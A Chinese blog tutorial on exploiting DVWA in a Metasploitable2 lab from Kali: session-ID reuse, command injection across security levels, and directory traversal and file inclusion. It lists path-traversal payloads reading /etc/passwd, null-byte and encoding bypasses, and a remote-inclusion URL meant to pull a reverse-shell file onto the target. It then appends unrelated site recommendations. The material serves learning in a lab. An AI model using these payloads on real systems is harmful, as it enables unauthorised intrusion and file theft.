比较常见类型漏洞讲解(一)_常见漏洞的特点及危害
liuian 2025-09-06 06:28 46 浏览
这里介绍一些手动挖掘漏洞时比较容易找到的漏洞,根据不同类型的漏洞来介绍。
演示准备
目标主机:Metasploitable2
攻击目标:目标主机的dvwa系统
攻击机:Kali
SessionId盗用
不知道你们有没有遇到过一些钓鱼链接,我们公司前段时间就收到了好多钓鱼邮件,这些钓鱼邮件多数时候其实是为了获取你的sessionId,不法分子盗取了你特定的sessionId,就相当于获取了你在对应系统中的权限。
这里不对盗取sessionId的过程进行展开,方式有很多,比如钓鱼网站或者钓鱼邮件。在这里主要是演示一下sessionId的使用。
如果本地有sessionId的话,都是存在cookies里面的:
当你未登录时,会给你一个新的sessionId,就算你知道目标url地址,直接访问过去,也会被跳转到登录页或者访客页面。
但当你将这个sessionId改成你已经登录的sessionId,就可以不用登录,直接访问内部地址。
后端对于sessionId的管理机制,对于账户安全影响非常大。比如每个账户的sessionId是否每次都随机生成,每个sessionId的有效性机制等等。
一般现在的系统在logout的时候都会将sessionId失效,所以不要小看系统中的logout按钮。
Command Execution
Command Execution是漏洞类型的名称,翻译过来大概就是命令执行漏洞。当你所能浏览的页面中有一个命令执行框时,你就该尝试一些特殊字符了,比如:“:”、“|”、“>”等等。当你确认被渗透系统的命令输入框存在安全漏洞,可以执行手动传入的特定命令时,我们就可以通过这个入口获取shell,然后提权,然后安装后门等等。
这个执行框的功能目标是对指定ip进行ping连接,检查路由是否通畅。
Command Execution-low
当安全等级为low时,这样输入指令,就能执行我们传入的命令:
可以看一下这个命令执行款在后端对应的逻辑代码:
可以看到后端在接收到操作者输入的指令后,没有做任何检验判断,直接组装成了命令进行执行。
Command Execution-medium
当安全等级为medium时,我们还是能够执行指定的命令:
看一下这个安全等级后端的实现代码:
可以看到后端虽然对接受的命令做了一些校验判断,但是还是有些漏网之鱼可以绕过校验,比如“|”、“&”等等。
Command Execution-high
将安全等级调到high,基本找不到执行我们传入命令的方式:
看一下逻辑代码:
可以看到,代码中将传入的字符串通过“.”进行了拆分,然后对拆分后的每一个部分都进行了判断,只有判断成功后才会重新组装成ip,对这个组装后的ip进行ping操作。这样就杜绝了传入一些尾巴一起被执行的漏洞。
Directory traversal / File include
Directory traversal 和 File include 严格来说这是两个漏洞类型,但是多数时候他们的表现形式非常相似,都有可能导致信息泄漏。
Directory traversal 翻译后是目录权限限制不严的意思。比如你能从当前服务对应的目录访问到/etc/passwd文件,就会暴露一下账户信息。
File include 翻译后是文件包含。有些编程语言提供了include方法,可以直接调用到其他目录的文件,也许是本地目录,也可能是其他主机的目录。
演示前,将靶机的/etc/php5/cgi/php.ini文件里的配置改一下:
配置修改成功后,要将重启服务:
找这类漏洞的时候可以特别关注一下这类特征:?变量=文件名
这类漏洞不绝对带有明显特征,但是多数情况下都带有这类特征。
比较经典的攻击方式:
# 如果不清楚当前具体位置,就多加一些../就行,因为到根目录后返回上层还是根目录
?page=../../etc/passwd
?page=file:///etc/passwd
# 从这里可以读取到一些源码,不能确定会造成多大危害
?home=main.cgi
# 这里可以弄个反弹shell的可执行文件,把地址传给靶机,靶机执行后我们就可以获取靶机的shell
?page=http://www.a.com/1.php 当后端做了一些校验判断,进行了字符过滤的时候,可以尝试在传参最后加这些特殊字符:
- “.”
- “%00”
比如这样传“?page=/etc/passwd%00.php”,在php的后端校验中,也许就绕过校验了。这些都是编程语言本身特性决定的,所以确认目标系统后端是用什么语言实现的,对于渗透工作也是很有帮助的。
让后端校验判断非常完善的时候,还可以试试将命令转码,例如:
url编码、双层url编码
%2e%2e%2f 解码:../
%2e%2e%5c 解码:..\
%252e%252e%255c 解码:..\
Unicode/UTF-8编码
..%c0%af 解码:../
..%c1%9c 解码:..\也许就绕过后端的校验了。
网上也有同学整理过一些经验,当你无法直接访问到你指定的文件时,可以这样尝试:
# 在结尾处加一些英文句号
?page=/etc/passwd...
# 在结尾处加多个空格
?page=/etc/passwd<spaces>
# 在结尾处加引号
?page=/etc/passwd""""""
# 在结尾处加一些尖括号
?page=/etc/passwd<<>><<>
# 在同层级目录中跳转几次
?page=./././passwd
# 在不同层级目录之间跳转一次
?page=ppp/../passwd这些方式往往会产生意想不到的效果。
kali作为专业渗透的集大成者,在里面也存放了这类漏洞的字典,可以参考使用:
Directory traversal / File include-low
看一下安全等级low的时候,利用这个漏洞:
如果这个漏洞是单纯的Directory traversal,直接传/etc/passwd是无法获取到信息的,需要其他传参才能获取到用户信息。
可以看一下这个安全等级下的逻辑代码:
对于入参没有做任何的校验判断。
Directory traversal / File include-medium
当安全等级medium的时候,利用这个漏洞:
看一下代码:
虽然做了校验,但是校验方式比较粗糙,没有起到很好的防护作用。而且看检验方式,好像能直接访问指定地址,在kali开一个监听:
将kali的地址作为参数传递,但是后端将“http://”替换成了“”,所以要在被替换字段里面加一个“http://”:
可以看到kali已经收到了请求:
虽然不能直接从靶机传一个shell过来,但是可以从kali传一些木马到靶机,然后想办法触发木马进一步控制靶机。
或者还可以这样,在kali的var/www/html中新建一个文件a.txt:
启动kali中的apache服务:
然后就可以将命令传递给靶机,得到执行结果了:
Directory traversal / File include-high
当安全等级high的时候,利用这个漏洞:
看一下代码:
校验的时候直接写死了,只能传include.php才能显示,不然就提示为找不到文件。真的这样写的话,其实都不需要传这个page参数,直接写死就行了。
最后提一下这种类型的漏洞不一定仅仅在url中,也可能在headers里面,所以做渗透测试的时候要多翻一翻,不要墨守成规。
相关推荐
- 手机psd转换成jpg最简单方式
-
可以使用photoshop工具,方法如下:1、首先打开PS软件,然后选择自己需要的JPG格式的图片,在PS中打开。2、接下来先按快捷键“Ctrl+j”将图片复制出来,防止后面操作对原图片有损...
- win7提示激活码过期怎么办(win7激活已过期)
-
以win7为例,出现这样的问题原因分析:电脑的win7系统激活过又重新提示要激活的原因是因为微软对网络上的秘钥进行封杀所以导致我们激活无效。具体的解决方法:1、我们打开dos命令窗口,在创立中输入“s...
- 联想笔记本光驱驱动下载(联想电脑光驱驱动器在哪)
-
开机时进入BIOS,具体按什么牌子不同,按键也不同,开机有提示的,选择启动项,把光驱启动的顺序放到第一.按F10保存,重新启动就是光驱启动啦不需要设置光驱驱动,笔记本自带光驱驱动光驱是电脑的硬件设备,...
- win10装机必备实用软件(win10电脑装机必备软件)
-
1、office大部分的版本如office2007、office2000、office2011、office2013、office2016、office365等都支持win10。2、需要注意...
- 迅雷无法下载的链接用什么下载
-
1.可以使用其他下载工具代替迅雷。2.迅雷可能无法下载的原因有很多,比如网络问题、软件故障等。其他下载工具可以提供类似的功能,但可能具有更好的稳定性和兼容性。3.一些常见的替代迅雷的下载工具包括...
- apple官方网站(apple官方网站旗舰店)
-
1、首先打开浏览器,输入https://www.apple.com/;2、即可浏览苹果官网。 苹果公司(AppleInc.)是美国一家高科技公司。由史蒂夫·乔布斯、斯蒂夫·沃兹尼亚克和罗·韦恩(R...
- 哪些手机用鸿蒙系统(都什么手机能用鸿蒙系统)
-
截至目前,国内有以下几款手机品牌可以装鸿蒙系统:1.华为:华为Mate40系列、P40系列、Mate30系列、MatePadPro系列等。2.荣耀:荣耀V40、荣耀30系列、荣耀X10系列等...
- 手机u盘读不出来了怎么修复(手机u盘读取不出来)
-
1、手机不支持OTG功能,所以将U盘连接到手机后,手机无法识别U盘的内容,因此显示不了;这种情况只能换台支持OTG功能的手机来连接U盘才行。2、手机支持OTG功能,但是使用的OTG线质量有问题导致无法...
- 笔记本散热器买哪种好(笔记本散热器买哪种好贴吧)
-
散热器有十大品牌:九州风神、超频三,酷冷至尊Tt、AVC、思民、捷冷、安钛克Antec、安耐美Enermax、海盗船Corsair。能位列十大品牌,每一种的质量和功能都有保障。、目前网上销量最高的是九...
-
- 打印机驱动一直安装失败(打印机驱动一直安装失败怎么办)
-
打印机驱动程序安装失败需要对电脑进行其他设置,详细步骤如下:1,在电脑桌面上找到【计算机】并用鼠标右击。2,右击后在出现的选项中找到【管理】选项并点击打开。3,接下里会进入到计算机控制台界面,在这里要根据自己的电脑选择64位或者32位,选择...
-
2026-01-14 12:55 liuian
- ctrl加谁是截图(ctrl和什么键可以截图)
-
第一种:Ctrl+PrScrn使用这个组合键截屏,获得的是整个屏幕的图片第二种:Alt+PrScrn这个组合键截屏,获得的结果是当前窗口的图片第三种:打开qq,使用快捷键Ctrl+...
- 技嘉主板bios设置启动顺序(技嘉主板bios设置启动顺序怎么设置)
-
启动顺序设置方法如下:1、重启电脑连续按[DEL]键进入BIOS设置,按DEL进入BIOS设置。2、按键盘方向键右键切换到BOOT选项,将windows10功能设置为"其它操作系统"...
-
- 目前台式电脑主机怎么选(台式主机选择)
-
每个人对电脑的性需要不同,因此根据自己家的家庭需要,选择合适的电脑即可。以下简单说明:1,双核处理器+2G内存+集成显卡+机械硬盘。性能满足上网、看电影、聊天、办公、玩象棋之类的小游戏。价格在2000以内可以买到;2,四核处理器+4G内存+...
-
2026-01-14 12:05 liuian
- 台式电脑如何用u盘重装系统(台式电脑如何用u盘重装系统应用)
-
1、重启电脑并进入BIOS;2、在BIOS中设置启动顺序,优先从U盘启动;3、从U盘启动,进入安装界面;4、选择安装语言、时区和键盘设置;5、选择安装方式,一般选择“清除整个硬盘并安装”;6、配置分区...
- 一周热门
-
-
飞牛OS入门安装遇到问题,如何解决?
-
如何在 iPhone 和 Android 上恢复已删除的抖音消息
-
Boost高性能并发无锁队列指南:boost::lockfree::queue
-
大模型手册: 保姆级用CherryStudio知识库
-
用什么工具在Win中查看8G大的log文件?
-
如何在 Windows 10 或 11 上通过命令行安装 Node.js 和 NPM
-
威联通NAS安装阿里云盘WebDAV服务并添加到Infuse
-
Trae IDE 如何与 GitHub 无缝对接?
-
idea插件之maven search(工欲善其事,必先利其器)
-
如何修改图片拍摄日期?快速修改图片拍摄日期的6种方法
-
- 最近发表
- 标签列表
-
- python判断字典是否为空 (50)
- crontab每周一执行 (48)
- aes和des区别 (43)
- bash脚本和shell脚本的区别 (35)
- canvas库 (33)
- dataframe筛选满足条件的行 (35)
- gitlab日志 (33)
- lua xpcall (36)
- blob转json (33)
- python判断是否在列表中 (34)
- python html转pdf (36)
- 安装指定版本npm (37)
- idea搜索jar包内容 (33)
- css鼠标悬停出现隐藏的文字 (34)
- linux nacos启动命令 (33)
- gitlab 日志 (36)
- adb pull (37)
- python判断元素在不在列表里 (34)
- python 字典删除元素 (34)
- vscode切换git分支 (35)
- python bytes转16进制 (35)
- grep前后几行 (34)
- hashmap转list (35)
- c++ 字符串查找 (35)
- mysql刷新权限 (34)
